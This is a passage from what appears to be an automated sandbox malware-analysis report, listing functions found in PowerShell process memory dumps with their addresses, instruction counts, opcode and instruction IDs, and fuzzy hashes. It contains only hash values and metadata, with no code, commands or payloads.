                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63ecfde33816c4908579f3ed4158de9fc53d3856b1758bd239dce5d697df71cf
                                                              • Instruction ID: 7960488a5afff86135b8622061814856d82d3afdf09231a8be023bc6abeef0a1
                                                              • Opcode Fuzzy Hash: 63ecfde33816c4908579f3ed4158de9fc53d3856b1758bd239dce5d697df71cf
                                                              • Instruction Fuzzy Hash: D0A15F75B002089FDB14EFA4D544AADBBF2FF84314F114658E806AB365EB74BD89CB40
                                                              Function 0468391F Relevance: .2, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28ad76cd3e1644dbd64df1e32d421a2b16bfaaf5058b585a7677fcd49c3530c7
                                                              • Instruction ID: 0b7b458faf4433a13de821e43bc34abd9ad747184df1fed01ffedafd8fbfc11d
                                                              • Opcode Fuzzy Hash: 28ad76cd3e1644dbd64df1e32d421a2b16bfaaf5058b585a7677fcd49c3530c7
                                                              • Instruction Fuzzy Hash: 86719E6190E3E15FCB03EB689C604E67FB0AF1762070A46C7D485CF2A3D5299E49C7E6
                                                              Function 04688B68 Relevance: .2, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72d5daa51330c363e0a37735d71eb78445a2e319220ba118d71d8a172c1def3a
                                                              • Instruction ID: 03272d182404aa44a0d7a71a0d5d83a480357b27d19b5511a5c0793c104e90d4
                                                              • Opcode Fuzzy Hash: 72d5daa51330c363e0a37735d71eb78445a2e319220ba118d71d8a172c1def3a
                                                              • Instruction Fuzzy Hash: 2291A070A052049FC715EF68D844AAEBBF2FF89314F5486AAE4459B361DB34EC85CB50
                                                              Function 08284E80 Relevance: .2, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f434ca8808cfc01bd48a232c9f2474a522f2e654651624f9b1e66eda5c638225
                                                              • Instruction ID: c7d121cec644b5f49ce5f79d42c667ae55678edfe8bf72a99a81fea14deb2c4d
                                                              • Opcode Fuzzy Hash: f434ca8808cfc01bd48a232c9f2474a522f2e654651624f9b1e66eda5c638225
                                                              • Instruction Fuzzy Hash: D8818170B10216CFCB15EF68C940AAEB7F6FF88311F148569D8199B3A5DB34AC46CB91
                                                              Function 04689AC8 Relevance: .2, Instructions: 193COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cae4091e82560510587f8a99853792826340ec0233cf9c5da90ff44d1d865486
                                                              • Instruction ID: a6b76dda8932f70d63254f361a68854d5f8f5e5e2c757cc5419c92c2118195a7
                                                              • Opcode Fuzzy Hash: cae4091e82560510587f8a99853792826340ec0233cf9c5da90ff44d1d865486
                                                              • Instruction Fuzzy Hash: 0B7182B0A002198FCB14DF68D844AAEBBF6FF85314F148669E415DB751EB75BC4ACB80
                                                              Function 04689C36 Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25cd315176503f4c8893d58eeb31f48dbdc16241baa375e4eb58c096ba9a6be0
                                                              • Instruction ID: 1562e2f29cc08d87fefb0ff97b4d153788ad1cf73097fcada8db8783a90db561
                                                              • Opcode Fuzzy Hash: 25cd315176503f4c8893d58eeb31f48dbdc16241baa375e4eb58c096ba9a6be0
                                                              • Instruction Fuzzy Hash: 26714070A006099FDB24DFA4D4447AEBBF6FF88304F14852DD416AB760EB75AD4ACB41
                                                              Function 04682B48 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 353dead6263185fd976174c0c68b4858a92ae63dd786ee5879ece134578f5987
                                                              • Instruction ID: 0d6a99a0b624281acd20b8afbdb73b8acf83ae0e793e2360345b4a368a2a037b
                                                              • Opcode Fuzzy Hash: 353dead6263185fd976174c0c68b4858a92ae63dd786ee5879ece134578f5987
                                                              • Instruction Fuzzy Hash: E4518F7190E3E55FC703DB6CD8A05DA7FB0EF47214B0945D7C489CB2A3D628A849CBA6
                                                              Function 08280448 Relevance: .1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7ea6cb4a103b86ae1dbe441ca15db4a4675f450eea7bb2113fb5b72dd51d12b
                                                              • Instruction ID: b854c1b9e02574188f24dc8ac253ac45ee1db54a232a3d270f69ce081d73a395
                                                              • Opcode Fuzzy Hash: e7ea6cb4a103b86ae1dbe441ca15db4a4675f450eea7bb2113fb5b72dd51d12b
                                                              • Instruction Fuzzy Hash: 5151BF74A01609CFCB15DF98C4909AEFBB6FF88311B248569D845AB3A0D735ED45CBA0
                                                              Function 07479F74 Relevance: .1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a814f024812e63fb8211b1f5729b2427f63c8f47d5bdbe4ca079a7fcd2485c50
                                                              • Instruction ID: 0465af784dde5a52cf1a0f65e7fd6d6003177d05263094567aa860617fa380c3
                                                              • Opcode Fuzzy Hash: a814f024812e63fb8211b1f5729b2427f63c8f47d5bdbe4ca079a7fcd2485c50
                                                              • Instruction Fuzzy Hash: 4D4108F1704352DFDB208E2886416EF7BA2EBC1215F58C867D9049B792D731E945C7A1
                                                              Function 082856B1 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a89702d03c35f124c739b253db487db07abb5b42fa91dbdee796c181297518f
                                                              • Instruction ID: 4ab79d39a1c2d8127c4fca0aa4e1e96d327710c4dc8d2ebeb94350f6d91c6c15
                                                              • Opcode Fuzzy Hash: 3a89702d03c35f124c739b253db487db07abb5b42fa91dbdee796c181297518f
                                                              • Instruction Fuzzy Hash: A4514974E11205DFCB05DF58C980AAEBBB1FF48321F248259E915AB3A1D735EC41CB90
                                                              Function 04689859 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c9b07d8fb788bd1f561e6f150cfb4ac725e3bc78e3d4fb3ecfd557dbbf8c6bd
                                                              • Instruction ID: 16f6fbbc8d91fdfa155ee0def92a0dc879e8470e5e95e7b92fe32b8e386c9664
                                                              • Opcode Fuzzy Hash: 6c9b07d8fb788bd1f561e6f150cfb4ac725e3bc78e3d4fb3ecfd557dbbf8c6bd
                                                              • Instruction Fuzzy Hash: BE41AC717002048FD714DB64D858BAE7BF2EF89750F08456DE806EBBA1EB38AC45CB50
                                                              Function 04689AB3 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 894cd4685cbcf27e106005b8b2a68b6f945894e9336ec97891c2d4d654bc4df8
                                                              • Instruction ID: 1e2908605e0292c8e485fdb88799c85f94f7c69a3904439f4f9fa1f4bac5635e
                                                              • Opcode Fuzzy Hash: 894cd4685cbcf27e106005b8b2a68b6f945894e9336ec97891c2d4d654bc4df8
                                                              • Instruction Fuzzy Hash: 36415EB0A006099FDB24DFA9C4447AEBBF6FF88314F14862DD415AB791EB75AC49CB40
                                                              Function 04683441 Relevance: .1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89c7edf98d9ab05a920aca7630eccbc1a38b24366c52791580175c748c4629ce
                                                              • Instruction ID: 1c45917794fddfec8d8ba53f5a1fe7e561ca66e215db205b0416d2321fb4eb93
                                                              • Opcode Fuzzy Hash: 89c7edf98d9ab05a920aca7630eccbc1a38b24366c52791580175c748c4629ce
                                                              • Instruction Fuzzy Hash: 17417BB4A002059FCB06DF58C498DAEFBB1FF48310B258A59D911AB365D736FD91CBA0
                                                              Function 08280438 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee454827635d5e1831a57ee619f0e02001d99a6576326adb6e45384e6758372c
                                                              • Instruction ID: fa08135e0a4d1c03af33b7aa524b7d799eb5eb740f2d8c4194bc8452736d2f9c
                                                              • Opcode Fuzzy Hash: ee454827635d5e1831a57ee619f0e02001d99a6576326adb6e45384e6758372c
                                                              • Instruction Fuzzy Hash: 86417C74A11609CFCB15DF98C4909BEFBB1FF48311B248669D811AB3A0C735EC45CBA0
                                                              Function 08285CA0 Relevance: .1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8facbdd8f4bae5ccae85287ce0d357691961904a34085d0a03c4b8a0e4529b1
                                                              • Instruction ID: c41819dba0db3f1a2380f96d149ac65ef3444763aef7df06c35e8f7a3919ae49
                                                              • Opcode Fuzzy Hash: d8facbdd8f4bae5ccae85287ce0d357691961904a34085d0a03c4b8a0e4529b1
                                                              • Instruction Fuzzy Hash: 42413B78A11109DFCB15DF88C5849AEFBB2FF48310B248169D905A73A4D732ED41CF90
                                                              Function 08285C9F Relevance: .1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b1dfa9059f557605e79dfc4a5fe61fa6a95db1c5b0547d30fb135b0c62e6093
                                                              • Instruction ID: 206afaf45feea5d8d15d2ee886c4c895889fca58bdd7ac1212e1ab47466f62b7
                                                              • Opcode Fuzzy Hash: 4b1dfa9059f557605e79dfc4a5fe61fa6a95db1c5b0547d30fb135b0c62e6093
                                                              • Instruction Fuzzy Hash: 57413978A11109DFCB15DF98C5849AEFBB2FF88310B248269D905AB3A4D732ED41CF90
                                                              Function 08285C50 Relevance: .1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a078c1b9bb98d11ffe113d2c87b810beb1844d65f2cfbef1980a6b5e976bf6aa
                                                              • Instruction ID: 0e1c905fb7b6f2c636b4bf6f2dbd2f43eb7e6e87471e316352e6f79a04399c25
                                                              • Opcode Fuzzy Hash: a078c1b9bb98d11ffe113d2c87b810beb1844d65f2cfbef1980a6b5e976bf6aa
                                                              • Instruction Fuzzy Hash: 3F418174A11205DFCB06DF98C594AAEBBB2FF48311F248259D952AB3A5D732EC41CF90
                                                              Function 0828079E Relevance: .1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd2e050a24f1f036afffbc814b9b3c93b133b01a271b0bfe5389beacd7503b88
                                                              • Instruction ID: fea6bf59bc8cdc0b29f27fd1991fbbd5b2f9b4ebeb97f66d26fc7a7a44858dca
                                                              • Opcode Fuzzy Hash: dd2e050a24f1f036afffbc814b9b3c93b133b01a271b0bfe5389beacd7503b88
                                                              • Instruction Fuzzy Hash: 6B312674A00609DFCB14DF88C580AAAF7F1FF48310B248259D919AB3A5C731EC81CB90
                                                              Function 046839B0 Relevance: .1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0be84ecc80e0db3941325434733c31577583674c5b8f223a62376a67ee3b4961
                                                              • Instruction ID: d326f347dc89472ad4af2fadc9e2cf864d0720f3a3608be9719a66181a6655b8
                                                              • Opcode Fuzzy Hash: 0be84ecc80e0db3941325434733c31577583674c5b8f223a62376a67ee3b4961
                                                              • Instruction Fuzzy Hash: AD211974A006099FCB05DF99C8909AAFBB1FF49310B158599E919EB361D735FC81CBA0
                                                              Function 04684A77 Relevance: .1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 602fb5ed670e18d8c0a83de3b7667e48f3b58be226390f13579e5a92cc74ee13
                                                              • Instruction ID: 444e0f3e48428c4295ed08c0f58c3641b7ba21d16fcd77c73225ab71fd590d39
                                                              • Opcode Fuzzy Hash: 602fb5ed670e18d8c0a83de3b7667e48f3b58be226390f13579e5a92cc74ee13
                                                              • Instruction Fuzzy Hash: FC210574A0020A9FCB04DF99C980AAAFBF1FF48310B148659E909EB751D735ED51CBA0
                                                              Function 04682B39 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c837838fc28a067f9af32fcd7ad4b940ac0e180fb16cb597a76e649df513c1f
                                                              • Instruction ID: 01c814f220032eb72eb20e28d94b28cd7628eb2848593e25180959faf179db85
                                                              • Opcode Fuzzy Hash: 3c837838fc28a067f9af32fcd7ad4b940ac0e180fb16cb597a76e649df513c1f
                                                              • Instruction Fuzzy Hash: B421FEB8A012099FCB00DF98D8909AEFBB5FF89310B158599E905E7351D735FD41CBA1
                                                              Function 0468F253 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bf81cd8dbabd91c285848d84e52a507fb0ff21dcdd88b46efc41254fefdfff4
                                                              • Instruction ID: 35b027c4d7f6a43ebb94d998680bbbbdd7bf2d03bd120c4f7917bc4c8652e590
                                                              • Opcode Fuzzy Hash: 3bf81cd8dbabd91c285848d84e52a507fb0ff21dcdd88b46efc41254fefdfff4
                                                              • Instruction Fuzzy Hash: 6B119334D04158DBEF28BAE4D5A87ECB771AB6531DF141A2DC401B6290FB746889CB15
                                                              Function 045DD01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197084723.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_45dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 020f315b950af57eb4db5bc2f74d313d638d1f2863d7728c7abcbcd6c40adf34
                                                              • Instruction ID: 8662f6eebdd92cb1c7705da1cc9b40f6e7b83f713bd44e53823a9aec539caf01
                                                              • Opcode Fuzzy Hash: 020f315b950af57eb4db5bc2f74d313d638d1f2863d7728c7abcbcd6c40adf34
                                                              • Instruction Fuzzy Hash: 9401FC711043409AE7305E1DECC4B66BFE8EF95325F08C919EC480B141E679A849D7B1
                                                              Function 08284B80 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 95741f33b38262e6a60a589a9d25291feeb0903a63653c71c605937d1c4d8f33
                                                              • Instruction ID: dcfc40693137e2ec3c4a076f593328449e2ba3158753d0b259746d2bcb2f3e72
                                                              • Opcode Fuzzy Hash: 95741f33b38262e6a60a589a9d25291feeb0903a63653c71c605937d1c4d8f33
                                                              • Instruction Fuzzy Hash: 1E015E30A2621ADFDF14FFE4C955AADBBB5EF44306F200428E902AB694CFB56851DF40
                                                              Function 08284DF0 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6dcf1c666f5cd8f3e77fffd4d8ceb47704dc67fae58cefb6d73f91c9d3f5e812
                                                              • Instruction ID: cf54b0446a9ee177fc328b936132ae458604fd9beb0305b3439df38143828bbb
                                                              • Opcode Fuzzy Hash: 6dcf1c666f5cd8f3e77fffd4d8ceb47704dc67fae58cefb6d73f91c9d3f5e812
                                                              • Instruction Fuzzy Hash: 3E01623021220ADBCA69BB28D14446DB7A6FFC5206394441DE1168BB94CF75EC52CB85
                                                              Function 08284A5F Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d84479d3cc7a49a99212b1f04852aa91ed5928cdee70e1edfbc04d34ba5ae362
                                                              • Instruction ID: b093c197d6181b598c8c35d43e26cb339514a4235d01e50fe33a1892f63ec705
                                                              • Opcode Fuzzy Hash: d84479d3cc7a49a99212b1f04852aa91ed5928cdee70e1edfbc04d34ba5ae362
                                                              • Instruction Fuzzy Hash: FE014C31A2230ADFDF14BBE0C855AAEBBB5AB44309F104428E502AB294DBB56941CF54
                                                              Function 08284E70 Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb3cb48ee77fd0f978cee6a494c7f1c82cb5d1f992f3437c5f0453669523c7d3
                                                              • Instruction ID: b74fb5d8c5f0e234d50a9099a2dc33ab4610aec8db5314bb09886b61073a6ef8
                                                              • Opcode Fuzzy Hash: eb3cb48ee77fd0f978cee6a494c7f1c82cb5d1f992f3437c5f0453669523c7d3
                                                              • Instruction Fuzzy Hash: 29F0B431E2530ADFCF01ABA9E8449EE7B78FB45221F804555D004D7295E7241C468BA5
                                                              Function 045DD01C Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197084723.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_45dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc93d6fd512416391a7ab3d4fc813789a9d082df0b62e6ad2035f564b697b1df
                                                              • Instruction ID: 512b4c77be445f9696cab1fb41e5f517e002608c4185e09989945ba7f3a33e17
                                                              • Opcode Fuzzy Hash: dc93d6fd512416391a7ab3d4fc813789a9d082df0b62e6ad2035f564b697b1df
                                                              • Instruction Fuzzy Hash: 64F0C871004340AEE7208E19DC84B62FFA8EF91334F18C55AED480B286D2796845CBB1
                                                              Function 08284CDB Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54f500beb074e1a4a4aaa9579e6571acc3f496965a14388c95931f4ef9761430
                                                              • Instruction ID: e12d40b4c7f56f42ff69e14cd2cd78e0409b277ef2dce5fcb978848238f5454b
                                                              • Opcode Fuzzy Hash: 54f500beb074e1a4a4aaa9579e6571acc3f496965a14388c95931f4ef9761430
                                                              • Instruction Fuzzy Hash: BBF0A93062620ADBDF08BBF4C915ABE7B75AB40309F200848E802AFAC4DFB469459B51
                                                              Function 08284B08 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b3f1911d0afe0aa66c5f2e75cf84aad6735e71ebf4e589f2f38affc888cf86f
                                                              • Instruction ID: 94bc0f73e2fdd29561d531a5c31b9579a085b6b5ef857cef1cea6e2c6a2f54ce
                                                              • Opcode Fuzzy Hash: 2b3f1911d0afe0aa66c5f2e75cf84aad6735e71ebf4e589f2f38affc888cf86f
                                                              • Instruction Fuzzy Hash: 97F0313052220EDFDB54EFE4D959AAE7B75EB44305F200028E406A7254DF745D45CF50
                                                              Function 08284ABC Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f97302620ad52e3b47b84ba199f5befcaa5ac5a4d9160678c7d0d5041d5af36
                                                              • Instruction ID: 56e4d7c75858111efa711dc889685bb05aa44d9923aba7b10bd8f6837ba633a8
                                                              • Opcode Fuzzy Hash: 7f97302620ad52e3b47b84ba199f5befcaa5ac5a4d9160678c7d0d5041d5af36
                                                              • Instruction Fuzzy Hash: F0F0143092221EDFDB54ABE4D949AADBBB5AB48305F200028E506AA294CB715912DF51
                                                              Function 08284BE0 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a88cd5b79590fb2902f8b6766dd9224ab6dbfbbb3a9f07755fa8c4c236a1f041
                                                              • Instruction ID: 646ffed2312f6c78e16c7ac1909f006618b56f54e271e4b1bc627cf19c4f7548
                                                              • Opcode Fuzzy Hash: a88cd5b79590fb2902f8b6766dd9224ab6dbfbbb3a9f07755fa8c4c236a1f041
                                                              • Instruction Fuzzy Hash: 4DF0373092121EDFDB64EFE4D949AAEBFB5EF48305F204028E816AB294CB706911CF51
                                                              Function 082849D8 Relevance: .0, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c203833af096bf119b7452499d556e3115613da2fd4008ce027e7536538886c
                                                              • Instruction ID: c799b150cdc2c8a93693ac8cf0dbcc756e7d20ba85908eb1ab9c8c3a935cefb5
